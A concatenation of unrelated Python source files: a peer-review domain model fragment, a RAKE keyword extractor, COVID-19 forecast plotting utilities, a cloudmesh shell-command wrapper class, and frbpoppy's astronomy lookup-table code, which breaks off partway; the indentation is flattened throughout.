@property
def submission_key(self):
return self._submission_key
@property
def unit_id(self):
return self._unit_id
class Submission(object):
"""Domain object for a student work submission."""
def __init__(self, contents=None, key=None):
self._contents = contents
self._key = key
@property
def contents(self):
return self._contents
@property
def key(self):
return self._key
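# Minimal illustrative sketch (not part of the module) of the state predicates
# on ReviewStep; the key values below are made-up placeholders.
def _demo_review_step_states():
    step = ReviewStep(
        assigner_kind=ASSIGNER_KIND_AUTO, state=REVIEW_STATE_ASSIGNED,
        reviewee_key='reviewee_key_placeholder',
        reviewer_key='reviewer_key_placeholder')
    assert step.is_assigned
    assert not step.is_completed and not step.is_expired
    return step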
|
|
# Implementation of RAKE - Rapid Automatic Keyword Extraction algorithm
# as described in:
# Rose, S., D. Engel, N. Cramer, and W. Cowley (2010).
# Automatic keyword extraction from individual documents.
# In M. W. Berry and J. Kogan (Eds.), Text Mining: Applications and Theory.
# John Wiley and Sons, Ltd.
#
# NOTE: The original code (from https://github.com/aneesha/RAKE)
# has been extended by a_medelyan (zelandiya)
# with a set of heuristics to decide whether a phrase is an acceptable candidate
# as well as the ability to set frequency and phrase length parameters
# important when dealing with longer documents
from __future__ import absolute_import
from __future__ import print_function
import re
import operator
import six
from six.moves import range
debug = False
test = False
def is_number(s):
try:
float(s) if '.' in s else int(s)
return True
except ValueError:
return False
def load_stop_words(stop_word_file):
"""
Utility function to load stop words from a file and return as a list of words
@param stop_word_file Path and file name of a file containing stop words.
@return list A list of stop words.
"""
stop_words = []
for line in open(stop_word_file):
if line.strip()[0:1] != "#":
for word in line.split(): # in case more than one per line
stop_words.append(word)
return stop_words
def separate_words(text, min_word_return_size):
"""
    Utility function to return a list of all words that have a length greater than a specified number of characters.
    @param text The text that must be split in to words.
    @param min_word_return_size The minimum number of characters a word must have to be included.
"""
splitter = re.compile('[^a-zA-Z0-9_\\+\\-/]')
words = []
for single_word in splitter.split(text):
current_word = single_word.strip().lower()
        # leave numbers in the phrase, but don't count them as words, since they tend to invalidate the scores of their phrases
if len(current_word) > min_word_return_size and current_word != '' and not is_number(current_word):
words.append(current_word)
return words
def split_sentences(text):
"""
Utility function to return a list of sentences.
@param text The text that must be split in to sentences.
"""
sentence_delimiters = re.compile(u'[\\[\\]\n.!?,;:\t\\-\\"\\(\\)\\\'\u2019\u2013]')
sentences = sentence_delimiters.split(text)
return sentences
def build_stop_word_regex(stop_word_file_path):
stop_word_list = load_stop_words(stop_word_file_path)
stop_word_regex_list = []
for word in stop_word_list:
word_regex = '\\b' + word + '\\b'
stop_word_regex_list.append(word_regex)
stop_word_pattern = re.compile('|'.join(stop_word_regex_list), re.IGNORECASE)
return stop_word_pattern
def generate_candidate_keywords(sentence_list, stopword_pattern, min_char_length=1, max_words_length=5):
phrase_list = []
for s in sentence_list:
tmp = re.sub(stopword_pattern, '|', s.strip())
phrases = tmp.split("|")
for phrase in phrases:
phrase = phrase.strip().lower()
if phrase != "" and is_acceptable(phrase, min_char_length, max_words_length):
phrase_list.append(phrase)
return phrase_list
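# Illustrative sketch of candidate-phrase extraction using an inline stop-word
# pattern instead of a stop-word file; the sentence and stop words below are
# arbitrary examples.
def _demo_candidate_keywords():
    pattern = re.compile(r'\bof\b|\bthe\b|\bare\b', re.IGNORECASE)
    sentences = split_sentences("Criteria of compatibility of the systems are considered")
    # Returns ['criteria', 'compatibility', 'systems', 'considered'].
    return generate_candidate_keywords(sentences, pattern)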
def is_acceptable(phrase, min_char_length, max_words_length):
# a phrase must have a min length in characters
if len(phrase) < min_char_length:
return 0
# a phrase must have a max number of words
words = phrase.split()
if len(words) > max_words_length:
return 0
digits = 0
alpha = 0
for i in range(0, len(phrase)):
if phrase[i].isdigit():
digits += 1
elif phrase[i].isalpha():
alpha += 1
# a phrase must have at least one alpha character
if alpha == 0:
return 0
# a phrase must have more alpha than digits characters
if digits > alpha:
return 0
return 1
def calculate_word_scores(phraseList):
word_frequency = {}
word_degree = {}
for phrase in phraseList:
word_list = separate_words(phrase, 0)
word_list_length = len(word_list)
word_list_degree = word_list_length - 1
#if word_list_degree > 3: word_list_degree = 3 #exp.
for word in word_list:
word_frequency.setdefault(word, 0)
word_frequency[word] += 1
word_degree.setdefault(word, 0)
word_degree[word] += word_list_degree #orig.
#word_degree[word] += 1/(word_list_length*1.0) #exp.
for item in word_frequency:
word_degree[item] = word_degree[item] + word_frequency[item]
    # Calculate word scores: score(w) = deg(w) / freq(w)
word_score = {}
for item in word_frequency:
word_score.setdefault(item, 0)
word_score[item] = word_degree[item] / (word_frequency[item] * 1.0) #orig.
#word_score[item] = word_frequency[item]/(word_degree[item] * 1.0) #exp.
return word_score
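# Worked sketch of the deg(w)/freq(w) score: for the single candidate phrase
# "linear diophantine equations", each word occurs once (freq = 1) and
# co-occurs with two other words (deg = 2 + 1 = 3), so every word scores 3.0.
# The phrase is an arbitrary example.
def _demo_word_scores():
    return calculate_word_scores(["linear diophantine equations"])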
def generate_candidate_keyword_scores(phrase_list, word_score, min_keyword_frequency=1):
keyword_candidates = {}
for phrase in phrase_list:
if min_keyword_frequency > 1:
if phrase_list.count(phrase) < min_keyword_frequency:
continue
keyword_candidates.setdefault(phrase, 0)
word_list = separate_words(phrase, 0)
candidate_score = 0
for word in word_list:
candidate_score += word_score[word]
keyword_candidates[phrase] = candidate_score
return keyword_candidates
class Rake(object):
def __init__(self, stop_words_path, min_char_length=1, max_words_length=5, min_keyword_frequency=1):
self.__stop_words_path = stop_words_path
self.__stop_words_pattern = build_stop_word_regex(stop_words_path)
self.__min_char_length = min_char_length
self.__max_words_length = max_words_length
self.__min_keyword_frequency = min_keyword_frequency
def run(self, text):
sentence_list = split_sentences(text)
phrase_list = generate_candidate_keywords(sentence_list, self.__stop_words_pattern, self.__min_char_length, self.__max_words_length)
word_scores = calculate_word_scores(phrase_list)
keyword_candidates = generate_candidate_keyword_scores(phrase_list, word_scores, self.__min_keyword_frequency)
sorted_keywords = sorted(six.iteritems(keyword_candidates), key=operator.itemgetter(1), reverse=True)
return sorted_keywords
if test:
text = "Compatibility of systems of linear constraints over the set of natural numbers. Criteria of compatibility of a system of linear Diophantine equations, strict inequations, and nonstrict inequations are considered. Upper bounds for components of a minimal set of solutions and algorithms of construction of minimal generating sets of solutions for all types of systems are given. These criteria and the corresponding algorithms for constructing a minimal supporting set of solutions can be used in solving all the considered types of systems and systems of mixed types."
# Split text into sentences
sentenceList = split_sentences(text)
#stoppath = "FoxStoplist.txt" #Fox stoplist contains "numbers", so it will not find "natural numbers" like in Table 1.1
stoppath = "RAKE/SmartStoplist.txt" #SMART stoplist misses some of the lower-scoring keywords in Figure 1.5, which means that the top 1/3 cuts off one of the 4.0 score words in Table 1.1
stopwordpattern = build_stop_word_regex(stoppath)
# generate candidate keywords
phraseList = generate_candidate_keywords(sentenceList, stopwordpattern)
# calculate individual word scores
wordscores = calculate_word_scores(phraseList)
# generate candidate keyword scores
keywordcandidates = generate_candidate_keyword_scores(phraseList, wordscores)
if debug: print(keywordcandidates)
sortedKeywords = sorted(six.iteritems(keywordcandidates), key=operator.itemgetter(1), reverse=True)
if debug: print(sortedKeywords)
totalKeywords = len(sortedKeywords)
if debug: print(totalKeywords)
print(sortedKeywords[0:(totalKeywords // 3)])
rake = Rake("SmartStoplist.txt")
keywords = rake.run(text)
print(keywords)
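# Hedged worked example (not part of the original module): RAKE scores each
# word as deg(w)/freq(w), where freq(w) counts occurrences across candidate
# phrases and deg(w) adds the number of co-occurring words. The phrases below
# are made up purely for illustration.
if __name__ == '__main__':
    demo_phrases = ["linear diophantine equations", "minimal set", "set"]
    demo_scores = calculate_word_scores(demo_phrases)
    # "set" occurs twice (freq=2) and co-occurs with one other word once,
    # so deg("set") = 3 and its score is 3/2 = 1.5.
    print(demo_scores["set"])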
|
|
# pylint: disable=g-bad-file-header
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Utilities for plotting metrics."""
import pathlib
from typing import Any, List, Sequence
from absl import logging
from dm_c19_modelling.evaluation import base_indexing
from dm_c19_modelling.evaluation import constants
import matplotlib
matplotlib.use("agg")
import matplotlib.pyplot as plt # pylint: disable=g-import-not-at-top
import numpy as np
import pandas as pd
def plot_metrics(metrics_df: pd.DataFrame, target_name: str,
last_observation_date: str, eval_dataset_creation_date: str,
forecast_horizon: int,
forecast_index_entries: Sequence[base_indexing.IndexEntryType],
num_dates: int, num_sites: int, cadence: int,
dropped_sites: np.ndarray) -> plt.Figure:
"""Plots metrics dataframe as a series of bar charts.
Args:
metrics_df: Dataframe of metrics, with columns [forecast_id, metric_name,
metric_value, target_name].
target_name: the target being predicted.
last_observation_date: the last date in the training data.
eval_dataset_creation_date: the creation date of the dataset used for
evaluation.
forecast_horizon: the number of days into the future that the forecasts
extend to.
forecast_index_entries: the entries in the forecast index for each of the
forecasts that are included in the metrics dataframe.
num_dates: the number of dates included in this evaluation.
num_sites: the number of sites included in this evaluation.
cadence: the cadence of the forecasts i.e. a cadence of 1 corresponds to
daily forecasts, a cadence of 7 corresponds to weekly forecasts.
dropped_sites: optional list of sites that were dropped during evaluation
from at least one forecast to ensure that all forecasts are for the same
sites.
Returns:
A series of bar plots, one for each metric calculated in the dataframe,
evaluating different forecasts against each other.
"""
fig = plt.figure(figsize=(4, 3))
plot_width = 2
offset = 0
column_width = 0.8
axes = []
metric_names = metrics_df.metric_name.unique()
for _ in metric_names:
ax = fig.add_axes([offset, 0.1, plot_width, 1.])
ax.grid(axis="y", alpha=0.3, which="both", zorder=0)
axes.append(ax)
offset += plot_width * 1.2
colour_map = plt.get_cmap("tab20c")(
np.linspace(0, 1.0, len(forecast_index_entries)))
x_centers = np.arange(len(forecast_index_entries))
for ax_idx, metric_name in enumerate(metric_names):
x_offset = ax_idx * column_width - plot_width / 2 + column_width / 2
x_values = x_centers + x_offset
ax = axes[ax_idx]
for bar_idx, forecast_entry in enumerate(forecast_index_entries):
forecast_id = forecast_entry["forecast_id"]
row = metrics_df.query(
f"forecast_id=='{forecast_id}' and metric_name=='{metric_name}'")
assert len(row) == 1, (
"Duplicate entries found in metrics dataframe. "
f"Found {len(row)} entries for {forecast_id} and {metric_name}")
row = row.iloc[0]
metric_value = row.metric_value
ax.bar(
x_values[bar_idx],
metric_value,
width=column_width,
zorder=2,
color=colour_map[bar_idx],
label=_get_model_label(forecast_entry))
ax.set_xticklabels([])
ax.set_xticks([])
ax.set_ylabel(metric_name)
axes[0].legend(
ncol=len(forecast_index_entries),
loc="center left",
bbox_to_anchor=[0., 1.07],
frameon=False)
fig.text(0, 0, _get_plot_footnote(num_sites, num_dates, dropped_sites,
cadence))
fig.suptitle(
_get_plot_title(target_name, last_observation_date,
eval_dataset_creation_date, forecast_horizon),
y=1.35,
x=1)
return fig
def _get_model_label(forecast_entry: base_indexing.IndexEntryType) -> str:
"""Gets a description of a model from its entry in the forecast index."""
description = str(forecast_entry["forecast_id"])
if "model_description" in forecast_entry["extra_info"]:
description += f": {forecast_entry['extra_info']['model_description']}"
return description
def _get_plot_title(target_name: str, last_observation_date: str,
eval_dataset_creation_date: str,
forecast_horizon: int) -> str:
"""Gets the title of the plot."""
return (
f"Comparison of metrics for predicting {target_name}. Forecast date: "
f"{last_observation_date}, forecast horizon: {forecast_horizon} days, "
f"evaluation reporting date: {eval_dataset_creation_date}.")
def _get_plot_footnote(num_sites: int, num_dates: int,
dropped_sites: np.ndarray, cadence: int):
"""Gets the footnote to be added to the plot."""
footnote = (
f"Forecasts evaluated in this plot have a cadence of {cadence} days. "
f"{num_dates} dates and {num_sites} sites were included in the "
"evaluation that produced this plot.")
if dropped_sites.size:
footnote += (
"Note that the following sites were dropped from some forecasts during "
f"evaluation to achieve an overlapping set of sites: {dropped_sites}")
return footnote
def _plot_trajectories(
all_forecast_entries: List[Any],
all_forecast_arrays: List[Any],
target_name: constants.Targets,
num_sites: int,
eval_dataset: Any = None
) -> plt.Figure:
"""Plots trajectories.
Args:
    all_forecast_entries: forecast index entries, one per forecast, each
      containing at least a "forecast_id" field.
    all_forecast_arrays: forecast data arrays, one per forecast, each exposing
      dates_array, sites_array and data_array attributes.
target_name: the target being predicted.
num_sites: number of sites to plot
eval_dataset: evaluation dataset
Returns:
Figure.
"""
fig = plt.figure(figsize=(16, 16))
dates = all_forecast_arrays[0].dates_array
num_dates = len(dates)
forecast_x = np.arange(num_dates)
x = forecast_x.copy()
  x_stride = 14  # x tick stride: one tick every two weeks for daily data.
previous_x = None
avg_values = []
for fa in all_forecast_arrays:
avg_values.append(np.squeeze(fa.data_array, axis=2).mean(axis=0))
site_indices = np.argsort(np.max(avg_values, axis=0))[::-1][:num_sites]
site_names = all_forecast_arrays[0].sites_array[site_indices]
n = len(site_names)
nrows = int(np.ceil(np.sqrt(n)))
ncols = int(np.ceil(n / nrows))
axes = fig.subplots(nrows, ncols)
fig.subplots_adjust(hspace=0.35)
flat_axes = sum(map(list, axes), [])
for _ in range(nrows * ncols - n):
ax = flat_axes.pop()
fig.delaxes(ax)
num_colors = len(all_forecast_entries) + 1
colormap = plt.get_cmap("tab20")
colors = [colormap(i / num_colors) for i in range(num_colors)]
if eval_dataset is not None:
num_previous_dates = num_dates
previous_dates = eval_dataset.training_dates[-num_previous_dates:]
previous_x = np.arange(num_previous_dates)
previous_true_ys = eval_dataset.training_targets[-num_previous_dates:, :, 0]
forecast_true_ys = eval_dataset.evaluation_targets[-num_previous_dates:, :,
0]
forecast_x += num_previous_dates
dates = np.concatenate([previous_dates, dates])
x = np.concatenate([previous_x, forecast_x])
num_dates = len(dates)
x_idx = np.arange(num_dates)[::-1][::x_stride][::-1]
# Center the x axis date ticks around the forecast date.
diffs = x_idx - forecast_x[0]
smallest_diff = np.argmin(np.abs(diffs))
x_idx -= diffs[smallest_diff]
x_idx = np.clip(x_idx, 0, len(x) - 1)
for ax, site_name in zip(flat_axes, site_names):
title = f'site_name="{site_name}"'
ax.set_title(title)
site_idx = all_forecast_arrays[0].sites_array.tolist().index(site_name)
if previous_x is not None:
previous_true_y = previous_true_ys[:, site_idx]
forecast_true_y = forecast_true_ys[:, site_idx]
# Plot vertical forecast date line.
combined_y = np.concatenate([previous_true_y, forecast_true_y])
mn = np.min(combined_y)
mx = np.max(combined_y)
ax.plot(
[forecast_x[0] - 0.5] * 2, [mn, mx],
color=(0.5, 0.5, 0.5),
linestyle="--",
label=f"(forecast date={dates[forecast_x[0]]})")
# Plot past and future true data.
ax.plot(previous_x, previous_true_y, color="k")
ax.plot(forecast_x, forecast_true_y, color="k", label="true_data")
# Plot the forecast trajectories.
ax.axes.set_prop_cycle(color=colors) # Color forecast curves differently.
for forecast_entry, forecast_array in zip(all_forecast_entries,
all_forecast_arrays):
y = forecast_array.data_array[:, site_idx, 0]
ax.plot(
forecast_x, y, label=f"forecast_id={forecast_entry['forecast_id']}")
ax.set_xticks(x[x_idx])
ax.set_xticklabels(dates[x_idx], rotation=30)
if ax.is_last_row():
ax.set_xlabel("Date")
if ax.is_first_col():
ax.set_ylabel(target_name.value)
if ax.is_first_col() and ax.is_first_row():
ax.legend(loc="upper left")
return fig
def plot_trajectories_and_save(directory: str, forecast_ids: Sequence[str],
eval_dataset_creation_date: str,
forecast_horizon: int, save: bool,
target_name: constants.Targets,
all_forecast_entries: List[Any],
all_forecast_arrays: List[Any],
num_sites: int = 16,
eval_dataset: Any = None,
overwrite: bool = False) -> None:
"""Plots trajectories and saves them to file."""
fig = _plot_trajectories(all_forecast_entries, all_forecast_arrays,
target_name, num_sites, eval_dataset=eval_dataset)
if save:
trajectories_dir = pathlib.Path(directory) / "trajectories"
filename_base = (
f"trajectories_{'_'.join(forecast_ids)}_{eval_dataset_creation_date}_"
f"{forecast_horizon}d")
plot_filepath = trajectories_dir / f"{filename_base}.png"
if not trajectories_dir.exists():
trajectories_dir.mkdir(parents=True)
if not overwrite and plot_filepath.exists():
raise IOError(f"Trajectories already exist at {plot_filepath}")
logging.info("Saving trajectory plots to %s", plot_filepath)
fig.savefig(plot_filepath, format="png", bbox_inches="tight")
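# Hedged usage sketch (not part of the original module), showing the expected
# shape of `metrics_df` and `forecast_index_entries` with made-up values.
if __name__ == "__main__":
  demo_metrics_df = pd.DataFrame({
      "forecast_id": ["f1", "f2", "f1", "f2"],
      "metric_name": ["rmse", "rmse", "mae", "mae"],
      "metric_value": [3.0, 2.5, 1.9, 1.7],
      "target_name": ["new_deceased"] * 4,
  })
  demo_entries = [{"forecast_id": "f1", "extra_info": {}},
                  {"forecast_id": "f2", "extra_info": {}}]
  demo_fig = plot_metrics(
      demo_metrics_df, "new_deceased", "2020-06-01", "2020-07-01",
      forecast_horizon=28, forecast_index_entries=demo_entries,
      num_dates=28, num_sites=50, cadence=1, dropped_sites=np.array([]))
  demo_fig.savefig("/tmp/demo_metrics.png", bbox_inches="tight")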
|
|
#
# demo to start os command
#
# from subprocess import check_output
# cmd = r'C:\cygwin64\bin\ps.exe'
# output = check_output(cmd)
# print (output)
import subprocess
import glob
import json
import platform
import os
from cloudmesh_base.util import path_expand
class Shell(object):
    cygwin_path = 'bin'  # copied from C:\cygwin\bin
command = {
'windows': {},
'linux':{},
'darwin': {}
}
    '''
    Open question (for badi and others): how do we dynamically define the
    wrapper functions below from a plain list of command names we want to
    support? Each wrapper takes an arbitrary number of positional arguments,
    roughly:

        def f(*args):
            name = <the command name derived from f>
            return cls.execute(name, arguments=list(args))

        commands = ['ps', 'ls', ...]
        for c in commands:
            # generate the wrapper for c and attach it to this class

    or do something simpler, such as one-line wrappers that call
    cls.execute(name, args) directly (which is what the hand-written methods
    below do). A sketch of the dynamic approach is given after the class
    definition below.
    '''
@classmethod
def ls(cls, *args): return cls.execute('ls', args)
@classmethod
def ps(cls, *args): return cls.execute('ps',args)
@classmethod
def bash(cls, *args): return cls.execute('bash',args)
@classmethod
def cat(cls, *args): return cls.execute('cat',args)
@classmethod
def git(cls, *args): return cls.execute('git',args)
@classmethod
def VBoxManage(cls, *args): return cls.execute('VBoxManage',args)
@classmethod
def blockdiag(cls, *args): return cls.execute('blockdiag',args)
@classmethod
def cm(cls, *args): return cls.execute('cm',args)
@classmethod
def fgmetric(cls, *args): return cls.execute('fgmetric',args)
@classmethod
def fgrep(cls, *args): return cls.execute('fgrep',args)
@classmethod
def gchproject(cls, *args): return cls.execute('gchproject',args)
@classmethod
def gchuser(cls, *args): return cls.execute('gchuser',args)
@classmethod
def glusers(cls, *args): return cls.execute('glusers',args)
@classmethod
def gmkproject(cls, *args): return cls.execute('gmkproject',args)
@classmethod
def grep(cls, *args): return cls.execute('grep',args)
@classmethod
def gstatement(cls, *args): return cls.execute('gstatement',args)
@classmethod
def head(cls, *args): return cls.execute('head',args)
@classmethod
def keystone(cls, *args): return cls.execute('keystone',args)
@classmethod
def kill(cls, *args): return cls.execute('kill',args)
@classmethod
def ls(cls, *args): return cls.execute('ls',args)
@classmethod
def mongoimport(cls, *args): return cls.execute('mongoimport',args)
@classmethod
def mysql(cls, *args): return cls.execute('mysql',args)
@classmethod
def nosetests(cls, *args): return cls.execute('nosetests',args)
@classmethod
def nova(cls, *args): return cls.execute('nova',args)
@classmethod
def ping(cls, *args): return cls.execute('ping',args)
@classmethod
def pwd(cls, *args): return cls.execute('pwd',args)
@classmethod
def rackdiag(cls, *args): return cls.execute('rackdiag',args)
@classmethod
def rm(cls, *args): return cls.execute('rm',args)
@classmethod
def rsync(cls, *args): return cls.execute('rsync',args)
@classmethod
def scp(cls, *args): return cls.execute('scp',args)
@classmethod
def sort(cls, *args): return cls.execute('sort',args)
@classmethod
    def sh(cls, *args): return cls.execute('sh', args)
@classmethod
def ssh(cls, *args): return cls.execute('ssh',args)
@classmethod
def sudo(cls, *args): return cls.execute('sudo',args)
@classmethod
def tail(cls, *args): return cls.execute('tail',args)
@classmethod
def vagrant(cls, *args): return cls.execute('vagrant',args)
@classmethod
def mongod(cls, *args): return cls.execute('mongod',args)
@classmethod
def grep(cls, *args): return cls.execute('grep',args)
@classmethod
def dialog(cls, *args): return cls.execute('dialog',args)
@classmethod
def pip(cls, *args): return cls.execute('pip',args)
@classmethod
def remove_line_with(cls, lines, what):
result = []
for line in lines:
if what not in line:
result = result + [line]
return result
@classmethod
def find_lines_with(cls, lines, what):
result = []
for line in lines:
if what in line:
result = result + [line]
return result
    def __init__(self):
        if self.operating_system() == "windows":
            self.find_cygwin_executables()
        else:
            # on linux/darwin there is nothing to do: the commands are
            # already on the PATH
            pass
@classmethod
def find_cygwin_executables(cls):
"""
find the executables
"""
exe_paths = glob.glob(cls.cygwin_path + r'\*.exe')
# print cls.cygwin_path
# list all *.exe in cygwin path, use glob
for c in exe_paths:
exe = c.split('\\')
name = exe[1].split('.')[0]
#command['windows'][name] = "{:}\{:}.exe".format(cygwin_path, c)
cls.command['windows'][name] = c
@classmethod
def terminal_type(cls):
"""
returns darwin, cygwin, cmd, or linux
"""
what = platform.system().lower()
kind = None
if 'linux' in what:
kind = 'linux'
elif 'darwin' in what:
kind = 'darwin'
elif 'cygwin' in what:
kind = 'cygwin'
else:
kind = 'cmd'
return kind
@classmethod
def ttype(cls):
t = cls.terminal_type()
if 'linux' in t or 'darwin' in t or 'cygwin' in t:
return 'linux'
elif 'cmd' in t:
return 'windows'
@classmethod
    def which(cls, command):
        t = cls.ttype()
        if 'windows' in t and cls.command_exists(command):
            return cls.command['windows'][command]
        elif 'linux' in t:
            cmd = ["which", command]
            result = subprocess.check_output(cmd).rstrip()
            if len(result) == 0:
                return None
            else:
                return result
@classmethod
def command_exists(cls, name):
t = cls.ttype()
if 'windows' in t:
#only for windows
cls.find_cygwin_executables()
return name in cls.command['windows']
elif 'linux' in t:
            r = cls.which(name)
return r
@classmethod
def list_commands(cls):
t = cls.ttype()
if 'windows' in t:
#only for windows
cls.find_cygwin_executables()
            print('\n'.join(cls.command['windows']))
else:
print ("ERROR: this command is not supported for this OS")
@classmethod
def operating_system(cls):
return platform.system().lower()
@classmethod
def execute(cls, cmd, arguments=""):
"""Run Shell command
:param cmd: command to run
:param arguments: we dont know yet
:param capture: if true returns the output
:return:
"""
# print "--------------"
terminal_type = cls.ttype()
# print cls.command
if ('linux' in terminal_type):
os_command = [cmd]
elif 'cmd' in terminal_type: # for cmd
if not cls.command_exists(cmd):
print "ERROR: the command could not be found", cmd
return
else:
os_command = [cls.command[cls.operating_system()][cmd]]
if isinstance(arguments, list):
os_command = os_command + arguments
elif isinstance(arguments, tuple):
os_command = os_command + list(arguments)
elif isinstance(arguments, str):
os_command = os_command + arguments.split()
else:
print "ERROR: Wrong parameter type", type(arguments)
result = subprocess.check_output(os_command, stderr=subprocess.STDOUT).rstrip()
return result
@classmethod
def mkdir(cls, newdir):
"""works the way a good mkdir should :)
- already exists, silently complete
- regular file in the way, raise an exception
- parent directory(ies) does not exist, make them as well
"""
"""http://code.activestate.com/recipes/82465-a-friendly-mkdir/"""
_newdir = path_expand(newdir)
if os.path.isdir(_newdir):
pass
elif os.path.isfile(_newdir):
raise OSError("a file with the same name as the desired "
"dir, '%s', already exists." % _newdir)
else:
head, tail = os.path.split(_newdir)
if head and not os.path.isdir(head):
                cls.mkdir(head)
if tail:
os.mkdir(_newdir)
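# Hedged sketch (not part of the original class) answering the question in the
# class docstring above: the one-line wrappers can be generated from a plain
# list of command names. The names in the example list are illustrative only.
def _add_shell_wrappers(names=('whoami', 'uname')):
    """Attach classmethods like Shell.whoami(*args) to Shell dynamically."""
    def make(name):
        def wrapper(cls, *args):
            return cls.execute(name, args)
        wrapper.__name__ = name
        return classmethod(wrapper)
    for name in names:
        setattr(Shell, name, make(name))
_add_shell_wrappers()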
def main():
shell = Shell()
    print(shell.terminal_type())
    r = shell.execute('pwd') # copy line replace
    print(r)
#shell.list()
#print json.dumps(shell.command, indent=4)
# test some commands without args
"""
for cmd in ['whoami', 'pwd']:
r = shell._execute(cmd)
print "---------------------"
print "Command: {:}".format(cmd)
print "{:}".format(r)
print "---------------------"
"""
r = shell.execute('ls', ["-l", "-a"])
print r
r = shell.execute('ls', "-l -a")
print r
r = shell.ls("-aux")
print r
r = shell.ls("-a", "-u", "-x")
print r
r = shell.pwd()
print r
if __name__ == "__main__":
main()
|
|
"""Create a lookup tables for redshift and the NE2001 dispersion measure."""
import os
import numpy as np
import sqlite3
import sys
from scipy.integrate import quad
from tqdm import tqdm
from joblib import Parallel, delayed
import frbpoppy.galacticops as go
from frbpoppy.misc import pprint
from frbpoppy.paths import paths
class NE2001Table:
"""Create/use a NE2001 lookup table for dispersion measure."""
def __init__(self, test=False):
"""Initializing."""
self.test = test
self.set_file_name()
# Setup database
self.db = False
self.step = 0.1
self.rounding = 2
# For parallel processes
self.temp_path = None
if self.test:
self.step = 0.1
if os.path.exists(self.file_name):
os.remove(self.file_name)
if os.path.exists(self.file_name) and self.test is False:
self.db = True
else:
# Calculations take quite some time
# Provide a way for people to quit
try:
self.create_table()
except KeyboardInterrupt:
pprint('Losing all progress in calculations')
os.remove(self.file_name)
                if self.temp_path:
os.remove(self.temp_path)
sys.exit()
def set_file_name(self):
"""Determine filename."""
uni_mods = os.path.join(paths.models(), 'universe/')
self.file_name = uni_mods + 'dm_mw.db'
if self.test:
uni_mods = os.path.join(paths.models(), 'universe/')
self.file_name = uni_mods + 'test_dm_mw.db'
def create_table(self, parallel=True):
"""Create a lookup table for dispersion measure."""
# Connect to database
conn = sqlite3.connect(self.file_name)
c = conn.cursor()
# Set array of coordinates
gls = np.arange(-180., 180. + self.step, self.step).round(1)
gbs = np.arange(-90., 90. + self.step, self.step).round(1)
dist = 0.1 # [Gpc]
gls = gls.astype(np.float32)
gbs = gbs.astype(np.float32)
# Create database
c.execute('create table dm ' +
'(gl real, gb real, dm_mw real)')
# Give an update on the progress
m = ['Creating a DM lookup table',
' - Only needs to happen once',
' - Unfortunately pretty slow',
' - Prepare to wait for ~1.5h (4 cores)',
' - Time given as [time_spent<time_left] in (hh:)mm:ss',
'Starting to calculate DM values']
for n in m:
pprint(n)
n_opt = len(gls)*len(gbs)
options = np.array(np.meshgrid(gls, gbs)).T.reshape(-1, 2)
dm_mw = np.zeros(len(options)).astype(np.float32)
def dm_tot(i, dm_mw):
gl, gb = options[i]
dm_mw[i] = go.ne2001_dist_to_dm(dist, gl, gb)
if parallel:
temp_path = os.path.join(paths.models(), 'universe/') + 'temp.mmap'
self.temp_path = temp_path
# Make a temp memmap to have a sharedable memory object
temp = np.memmap(temp_path, dtype=dm_mw.dtype,
shape=len(dm_mw),
mode='w+')
# Parallel process in order to populate array
r = range(n_opt)
j = min([4, os.cpu_count() - 1])
print(os.cpu_count())
Parallel(n_jobs=j)(delayed(dm_tot)(i, temp) for i in tqdm(r))
# Map results
r = np.concatenate((options, temp[:, np.newaxis]), axis=1)
results = map(tuple, r.tolist())
            # Delete the temporary memmap file
try:
os.remove(temp_path)
except FileNotFoundError:
print(f'Unable to remove {temp_path}')
else:
for i in tqdm(range(n_opt)):
dm_tot(i, dm_mw)
# Save results to database
dm_mw = dm_mw.astype(np.float32)
r = np.concatenate((options, dm_mw[:, np.newaxis]), axis=1)
results = map(tuple, r.tolist())
pprint(' - Saving results')
c.executemany('insert into dm values (?,?,?)', results)
# Make for easier searching
c.execute('create index ix on dm (gl, gb)')
# Save
conn.commit()
pprint('Finished DM table')
def lookup(self, gal, gab):
"""Look up associated milky way dispersion measure with gal coords.
Args:
gl (array): Galactic longitude [fractional degrees]
gb (array): Galactic latitude [fractional degrees]
Returns:
dm_mw (float): Galactic dispersion measure [pc*cm^-3]
"""
# Connect to database
conn = sqlite3.connect(self.file_name)
c = conn.cursor()
dm_mw = np.ones_like(gal)
# Round values
def frac_round(x, prec=self.rounding, base=1):
return np.round(base * np.round(x/base), prec)
# Round values
gal = frac_round(gal, self.rounding)
gab = frac_round(gab, self.rounding)
# Search database
query = 'select dm_mw from dm where gl=? and gb=? limit 1'
for i, gl in enumerate(gal):
dm_mw[i] = c.execute(query, [str(gl), str(gab[i])]).fetchone()[0]
# Close database
conn.close()
return dm_mw
class DistanceTable:
"""
Create/use a lookup table for comoving distance, volume, redshift etc.
Create a list of tuples to lookup the corresponding redshift for a comoving
distance [Gpc] (or the other way around). Uses formulas from
Hoggs et al. (1999) for the cosmological calculations. To avoid long
calculation times, it will check if a previous run with the same parameters
has been done, which it will then load it. If not, it will calculate a new
table, and save the table for later runs. Covers z, dist, vol, dvol,
cdf_sfr and cdf_smd.
Args:
H_0 (float, optional): Hubble parameter. Defaults to 67.74 km/s/Mpc
W_m (float, optional): Omega matter. Defaults to 0.3089
W_k (float, optional): Omega vacuum. Defaults to 0.6911
"""
def __init__(self, H_0=67.74, W_m=0.3089, W_v=0.6911, test=False):
"""Initializing."""
self.H_0 = H_0
self.W_m = W_m
self.W_v = W_v
self.test = test
self.set_file_name()
# Setup database
self.db = False
self.step = 0.00001
self.z_max = 6.5
if self.test:
self.step = 0.001
self.z_max = 6.5
if os.path.exists(self.file_name):
os.remove(self.file_name)
if os.path.exists(self.file_name) and self.test is False:
self.db = True
else:
# Calculations take quite some time
# Provide a way for people to quit
try:
self.create_table()
except KeyboardInterrupt:
pprint('Losing all progress in calculations')
os.remove(self.file_name)
sys.exit()
def set_file_name(self):
"""Determine filename."""
uni_mods = os.path.join(paths.models(), 'universe/')
def cvt(value):
"""Convert a float to a string without a period."""
return str(value).replace('.', 'd')
# Convert
paras = ['h0', cvt(self.H_0),
